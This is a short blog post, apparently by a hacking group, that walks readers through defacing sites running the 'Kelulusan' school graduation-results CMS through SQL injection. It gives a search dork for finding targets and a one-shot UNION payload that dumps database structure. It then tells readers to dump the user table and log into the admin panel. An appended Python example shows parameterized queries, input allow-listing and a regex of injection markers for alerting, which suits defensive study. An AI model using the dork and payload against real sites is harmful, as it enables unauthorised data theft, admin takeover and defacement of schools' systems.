
Monday, June 17, 2019


Defacement via SQL Injection in CMS Kelulusan
Date : 16 June 2019
Author : Ulin + Endang
Garuda Security hacker
CMS github : https://github.com/slametbsan/kelulusan/
Vuln : SQL
######################
Dork :
intext:"Masukkan nomor ujianmu pada form yang disediakan"
Enter the DIOS into the form on the page
' union select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6,7,8-- -
(@Ulin made the DIOS, because I'm a noob at manual SQL injection)
The database will then appear
After that, go ahead and dump it manually yourself.
Dump : un_user
Login : site/path/admin
If the site has a main database, just dump that as well
And enjoy

Source? https://www.postekno.net
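
For maintainers of an exam-number lookup form like the one described above, this added example (not code from the post or from the CMS) shows the fix for this class of bug: allow-list validation of the submitted value plus a bound query parameter, with a flag for logging hostile input. The table and column names, the exam-number format, and the use of SQLite as a stand-in database are assumptions.

```python
import re
import sqlite3

# Assumptions (not from the CMS): table/column names and the exam-number format.
EXAM_NO = re.compile(r"\d[\d-]{3,19}")
# Markers present in the string the post pastes into the form; used only for alerting.
SQLI_MARKERS = re.compile(r"'|--|/\*|\bunion\b|\bselect\b|information_schema", re.I)

def make_db():
    """Constructed in-memory stand-in for the graduation results table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE results (exam_no TEXT PRIMARY KEY, name TEXT, status TEXT)")
    db.executemany(
        "INSERT INTO results VALUES (?, ?, ?)",
        [("12-345-678-9", "Student A", "LULUS"), ("12-345-679-0", "Student B", "TIDAK LULUS")],
    )
    return db

def lookup(db, raw):
    """Return ((name, status) or None, alert) for one submitted form value."""
    value = raw.strip()
    alert = bool(SQLI_MARKERS.search(value))  # feed this to logging / WAF metrics
    if not EXAM_NO.fullmatch(value):
        return None, alert  # allow-list check: the value never reaches the database
    # Vulnerable pattern to avoid: "... WHERE exam_no = '" + value + "'"
    # Bound parameter: the driver sends the value as data, never as SQL text.
    row = db.execute(
        "SELECT name, status FROM results WHERE exam_no = ?", (value,)
    ).fetchone()
    return row, alert

if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: a valid number, an unknown number, a quote-bearing string.
    for sample in ["12-345-678-9", "99-999-999-9", "' union select 1,2-- -"]:
        print(repr(sample), "->", lookup(db, sample))
```

Running the public lookup under a database account that has SELECT on the results table only also limits what a missed injection can read, since MySQL's information_schema lists only objects the account has privileges on.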
